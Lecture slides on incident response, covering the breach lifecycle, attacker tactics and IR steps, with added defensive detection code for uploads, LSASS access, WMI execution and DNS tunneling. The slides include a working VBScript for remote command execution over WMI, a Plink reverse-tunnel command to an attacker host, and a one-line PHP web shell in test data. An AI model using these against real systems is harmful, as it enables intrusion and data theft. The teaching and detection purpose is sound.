COMP SCI 355

Week 3
Intro to Incident Response
Professor Dr. Yan Chen & Jibran Ilyas
Incident Response is the organized "fight back" once an anomaly is detected in the network: a structured way of managing the aftermath of a security incident (breach). The basic goals are to contain the damage and to minimize recovery time and cost.
Breach Lifecycle

1. Infiltration
2. Privilege Escalation
3. Lateral Movement
4. Data Aggregation
5. Data Exfiltration
Infiltration

+ Spear Phishing Emails

+ Drive-By Attack (Web Exploits attacking website visitors)

+ Vulnerable Web Servers

+ Stolen Credentials and Access through the Front Door

+ Wireless Vulnerabilities & Man-in-the-Middle Attacks

+ Social Engineering (Physical Breach)

Infiltration can take place using remote access tools...

.... Infiltration Tactics

.... Or through web services exploitation

• SQL Injection
• Missing upload file-type verification (a web shell is uploaded instead of a JPEG)
• Cross Site Scripting (XSS)
• Web Application Vulnerabilities (zero days)
• Default Credentials (full admin access)
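The upload bullet above is the classic "shell instead of jpeg" bug: the server trusts the client-supplied Content-Type and does a loose match on the file name. The following Python is an added example written for these notes, not code from the course or from any real uploader; the allowed-extension list, the magic-byte table and the helper names are assumptions made for the illustration. It puts the weak check beside a hardened one that validates only what the server can verify itself.

```python
"""Upload file-type check: the weak check the slide describes beside a hardened one.

Added example (not from the course slides). The extension allowlist, magic-byte
table and helper names are assumptions made for this illustration.
"""
import os
import secrets

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes of the image formats we accept (assumed allowlist for this example).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def weak_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """Typical broken uploader: trusts the client's Content-Type and only looks
    for '.jpg' somewhere in the name, so 'shell.jpg.php' with a spoofed
    Content-Type sails through. The file body is never inspected."""
    return content_type.startswith("image/") and ".jpg" in filename.lower()


def hardened_accepts(filename: str, content_type: str, data: bytes) -> bool:
    """Validates what the server can verify itself; Content-Type is ignored
    because the client controls it."""
    base = os.path.basename(filename)          # strip any directory component
    stem, ext = os.path.splitext(base.lower())
    if ext not in ALLOWED_EXT:                 # strict allowlist on the final extension
        return False
    if "." in stem:                            # reject double extensions (shell.php.jpg)
        return False
    if not data.startswith(MAGIC[ext]):        # file header must match the claimed type
        return False
    return True


def storage_name(filename: str) -> str:
    """Server-chosen name: the uploader never controls where the file lands or
    what it is called; only the (already validated) extension is kept."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16          # constructed JPEG header
    php = b"<?php system($_GET['c']); ?>"              # constructed web shell body
    print(weak_accepts("shell.jpg.php", "image/jpeg", php))       # True: shell accepted
    print(hardened_accepts("shell.jpg.php", "image/jpeg", php))   # False
    print(hardened_accepts("photo.jpg", "text/plain", jpeg))      # True: header decides
```

The magic-byte check is necessary but not sufficient on its own: a valid JPEG with PHP appended still passes it, which is why the hardened path also forbids executable extensions and renames the file. Uploads should additionally be served from a location where the web server does not execute scripts.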
Privilege Escalation

+ Extraction of Domain Admin passwords via Cached Credentials on Desktops

+ Mimikatz, Pwdump, Fgdump, Powershell version of Password dumping tools

+ Windows Credentials Editor for pass-the-hash attacks

+ Phishing Credentials via Fake Outlook Webmail page

+ LSASS process memory dump taken offline for credential extraction with Mimikatz
Typical Pass The Hash Attack

Tiers in the diagram:
- Power: Domain Controllers
- Data: Servers and Applications
- Access: Users and Workstations

1. Bad guy targets workstations en masse
2. User running as local admin compromised, bad guy harvests credentials.
3. Bad guy uses credentials for lateral traversal
4. Bad guy acquires domain admin credentials and associated privileges: privilege escalation
5. Bad guy has direct or indirect access to read/write/destroy data and systems in the environment.

Lateral Movement

+ Once Domain Admin credentials are gained, internal reconnaissance is done.
  Tools like NMAP, IPscan and other system administration utilities are utilized.

+ Attackers leave backdoors to maintain access.

+ Scheduled Tasks, PowerShell and WMI (built-in Windows tools) are used for lateral movement.

+ Domain controllers, file servers, POS software update server, DVR server, WSUS server, remote access server, file integrity server, Microsoft SCCM, other security products, etc. are used for lateral movement.

+ Basically, advanced network admin skills are utilized for lateral movement, e.g. Remote Desktop, command-prompt (DOS) commands, file shares, etc.
Sample Lateral Movement Script (replaces PsExec.exe)

' Usage: cscript lateral.vbs <target> <user> <password> <command line>
' Connects to the target's WMI service over DCOM with the supplied credentials
' and calls Win32_Process.Create, the same remote execution primitive that
' "wmic /node:<target> process call create" uses. No binary is copied and no
' service is installed on the target, unlike PsExec.
strComputer = WScript.Arguments(0)
strAdmin    = WScript.Arguments(1)
strPassword = WScript.Arguments(2)
strExe      = WScript.Arguments(3)

Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService = objLocator.ConnectServer(strComputer, "Root\cimv2", strAdmin, strPassword)

' Build the input parameters for Win32_Process.Create and set the command line
Set objProcess = objService.Get("Win32_Process")
Set objProgram = objProcess.Methods_("Create").InParameters.SpawnInstance_
objProgram.CommandLine = strExe

' Execute; the returned object carries the out parameters. On the target the new
' process is started as a child of WmiPrvSE.exe.
Set objResult = objService.ExecMethod("Win32_Process", "Create", objProgram)
WScript.Echo "ReturnValue=" & objResult.ReturnValue & " ProcessId=" & objResult.ProcessId
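Two of the tactics on the Privilege Escalation and Lateral Movement slides leave well-known host traces: reading LSASS memory requires the reader to open lsass.exe with PROCESS_VM_READ, a process created through Win32_Process.Create (the WMI script above, or wmic /node) appears as a child of WmiPrvSE.exe on the target, and PsExec installs a service named PSEXESVC. The Python below is an added triage example written for these notes, not course code or a product's detection content; the events are constructed in Sysmon / System-log field names, and the allowlists and thresholds are assumptions that need tuning per environment.

```python
"""Triage of Sysmon-style events for two tactics on these slides:
LSASS memory access (credential dumping) and remote execution through WMI
or PsExec (lateral movement).

Added example, not from the course slides. The events below are constructed,
and the allowlists are assumptions that must be tuned per environment.
"""
from typing import Dict, List, Tuple

PROCESS_VM_READ = 0x0010  # access right any LSASS memory reader needs on lsass.exe

# Processes that legitimately open lsass.exe with read access (assumed; tune per host)
LSASS_READERS_OK = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}
# Children of WmiPrvSE.exe that are expected on this host (assumed; tune per host)
WMI_CHILDREN_OK = {"werfault.exe"}


def _image_name(path: str) -> str:
    """Last path component, lower-cased, so rules compare file names only."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Returns (rule, host, detail) for every suspicious event, in log order."""
    hits = []
    for ev in events:
        host = ev.get("Computer", "?")
        eid = ev["EventID"]
        if eid == 10 and _image_name(ev["TargetImage"]) == "lsass.exe":
            # Sysmon 10 (ProcessAccess): dumping LSASS needs PROCESS_VM_READ in the mask.
            granted = int(ev["GrantedAccess"], 16)
            src = _image_name(ev["SourceImage"])
            if granted & PROCESS_VM_READ and src not in LSASS_READERS_OK:
                hits.append(("lsass_read", host, f"{src} GrantedAccess={ev['GrantedAccess']}"))
        elif eid == 1:
            # Sysmon 1 (ProcessCreate): Win32_Process.Create spawns the new process
            # under WmiPrvSE.exe on the target.
            parent = _image_name(ev["ParentImage"])
            child = _image_name(ev["Image"])
            if parent == "wmiprvse.exe" and child not in WMI_CHILDREN_OK:
                hits.append(("wmi_remote_exec", host, f"{child} {ev.get('CommandLine', '')}".strip()))
        elif eid == 7045:
            # System log 7045 (new service installed): PsExec installs PSEXESVC.
            if "psexesvc" in ev.get("ServiceFileName", "").lower():
                hits.append(("psexec_service", host, ev["ServiceFileName"]))
    return hits


# Constructed sample events (fields named as Sysmon / the System log name them).
SAMPLE_EVENTS = [
    {"EventID": 10, "Computer": "WS-042", "SourceImage": "C:\\Users\\bob\\Downloads\\procdump.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "Computer": "WS-042", "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Computer": "FS-01", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c net user backup P@ss /add"},
    {"EventID": 1, "Computer": "FS-01", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": 7045, "Computer": "DC-01", "ServiceFileName": "%SystemRoot%\\PSEXESVC.exe"},
]

if __name__ == "__main__":
    for rule, host, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

The LSASS rule deliberately keys on the access mask rather than a tool name, since the dumping tool changes per intrusion while the required access right does not. The WmiPrvSE rule will need an allowlist in environments where management agents legitimately run commands through WMI; correlate the hit with the Security-log network logon that preceded it to find the source host.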
Data Aggregation

+ Custom programs are executed to look for database servers, file servers and important machines, such as developers' systems.

+ Attackers first go through the process manually and then automate it with scripts.

+ One-time heists, like database extraction of PII, are usually done with planning, e.g. extract during holidays, or run a DDoS attack to keep administrators busy.

+ In credit card breaches, keystroke logging, network sniffing and RAM dumping (memory scraping) are used for data aggregation.

+ In nation-state attacks, one of the most common pieces of data targeted is the keystroke input typed by the victims.
Data Exfiltration

+ Exfiltration is common on TCP ports 80 & 443 as they are allowed for web browsing.

+ Chunked files (to evade DLP tools) are used by the attackers.

+ DNS tunneling for data exfiltration (since DNS traffic is allowed outbound).

+ Use of reverse tunneling tools, e.g.

  Plink.exe [email protected] -pw <password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389

  This makes an outbound SSH-2 connection to the attacker's host on port 443 with no shell or terminal (-N -T) and compression (-C); the remote forward (-R) exposes the victim's own RDP service, 127.0.0.1:3389, on port 44489 of the attacker's host, so the attacker gets inbound RDP through an outbound "HTTPS" connection.

+ Exfiltration to legit sites like Google Docs to avoid detection.
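DNS tunneling, as described in the bullet above, encodes the stolen data into query names, so the queries for the attacker's domain look nothing like browsing: almost every subdomain is unique, the labels are long and high-entropy, and TXT or NULL records are favoured for their payload capacity. The Python below is an added example written for these notes, not course material or a product's logic; the query-log format, the thresholds and the "last two labels" base-domain rule are assumptions for the illustration (real code would use the Public Suffix List).

```python
"""Spotting DNS-tunnel style exfiltration in a resolver query log.

Added example, not from the course slides. Log format, thresholds and the
two-label "base domain" rule are assumptions for this illustration (real code
would use the Public Suffix List for base-domain extraction).
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple


def shannon_entropy(s: str) -> float:
    """Bits per character; base32/base64 payload labels score high, words score low."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str) -> str:
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])           # assumed: registrable domain = last two labels


def profile(log_lines: List[str]) -> Dict[str, dict]:
    """Per base domain: query count, share of distinct subdomains, mean payload
    length, mean payload entropy and share of TXT/NULL queries."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "len": 0, "ent": 0.0, "txt": 0})
    for line in log_lines:
        # constructed log format: "<time> <client> <qtype> <qname>"
        _ts, _client, qtype, qname = line.split()
        qname = qname.rstrip(".").lower()
        base = base_domain(qname)
        payload = qname[: -len(base) - 1] if qname != base else ""   # everything left of the base
        st = stats[base]
        st["queries"] += 1
        st["subdomains"].add(payload)
        st["len"] += len(payload)
        st["ent"] += shannon_entropy(payload.replace(".", ""))
        st["txt"] += int(qtype in ("TXT", "NULL"))
    out = {}
    for base, st in stats.items():
        n = st["queries"]
        out[base] = {
            "queries": n,
            "unique_ratio": len(st["subdomains"]) / n,
            "mean_len": st["len"] / n,
            "mean_entropy": st["ent"] / n,
            "txt_share": st["txt"] / n,
        }
    return out


def suspicious(log_lines: List[str], min_queries: int = 5) -> List[Tuple[str, dict]]:
    """Flags base domains whose subdomains look like encoded payload chunks.
    Thresholds are assumptions; tune them against a baseline of normal traffic."""
    hits = []
    for base, p in profile(log_lines).items():
        if p["queries"] < min_queries:     # too few queries to judge
            continue
        score = ((p["unique_ratio"] > 0.9) + (p["mean_len"] > 30)
                 + (p["mean_entropy"] > 3.5) + (p["txt_share"] > 0.5))
        if score >= 2:
            hits.append((base, p))
    return hits


# Constructed sample: normal browsing plus a tunnel pushing base32-looking chunks to tun.example.net
SAMPLE_LOG = [
    "10:00:01 10.0.0.5 A www.example.com",
    "10:00:02 10.0.0.5 A mail.example.com",
    "10:00:03 10.0.0.5 A www.example.com",
    "10:00:04 10.0.0.5 AAAA cdn.example.com",
    "10:00:05 10.0.0.5 A www.example.com",
    "10:00:06 10.0.0.7 TXT nbswy3dpeb3w64tmmqqgs4zamnxwizlemvsa.tun.example.net",
    "10:00:07 10.0.0.7 TXT kryggzlsmvuwc2lsmzqwe2lomvxhiidbonqwe.tun.example.net",
    "10:00:08 10.0.0.7 TXT orsxg5bamfzgkidsn5wwk4tooqqgc3tefqqga.tun.example.net",
    "10:00:09 10.0.0.7 TXT 3dtfzy3oneqgk3tdn5sgkzbamfzsa3lfnzss4.tun.example.net",
    "10:00:10 10.0.0.7 TXT ijqxgzjsgiqgc3tefq4cmyl3aomnqwk3lpnqq.tun.example.net",
]

if __name__ == "__main__":
    for base, p in suspicious(SAMPLE_LOG):
        print(base, {k: round(v, 2) for k, v in p.items()})
```

Scoring on several weak signals rather than one strong one is deliberate: CDNs and some security products also generate long, unique-looking subdomains, so a single feature produces noise, while the combination of near-total uniqueness, long labels and TXT/NULL preference is rare in benign traffic. The same per-domain profile also exposes the slower "chunked file" pattern when run over a day of logs rather than minutes.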
Incident Response Process

+ Scoping / Triage / Contracts

+ Onsite Interviews

+ Strategic Plan

+ Containment

+ Response (Collections & Analysis)

+ Remediation

Scoping / Triage / Contracts

+ Victim’s first discussion with IR Professionals to triage the incident

+ Understanding of the Environment affected and resource bandwidth discussions

+ Terms and Conditions of the Engagement (Timing, Access & Liabilities)

Interviews

+ Mostly done on the first day onsite, with the Executive Team, IT Team and the Security Team

+ Attempt to gain an understanding of the environment and how the attackers might have circumvented it

+ Access procedures (remote and onsite) are discussed, e.g. VPN access, ability to connect own laptop to the environment
Strategic Plan

+ Comprehensive planning is done with the goals of timely containment, a focused investigation and fast recovery.
Containment

+ Decisions taken on how to do initial remediation

+ Consideration of the risk of tipping off the attackers (premature or partial containment can cause them to change tools and infrastructure before the full scope is known)

+ Business operations considerations and resource bandwidth considerations.
Response

+ Volatile Data Collection and Disk Images Collection

+ Log Analysis (Firewall Logs, NetFlow, Web Proxy Logs, Web Server Logs, etc.)

+ Deep Forensics Analysis on Disk Images and Memory Images
Remediation

+ Discussion on the priority and order of remediation steps post investigation

+ Long Term Resiliency Planning

+ Training for IR and Security Operation Staff

End of Week 3 Slides
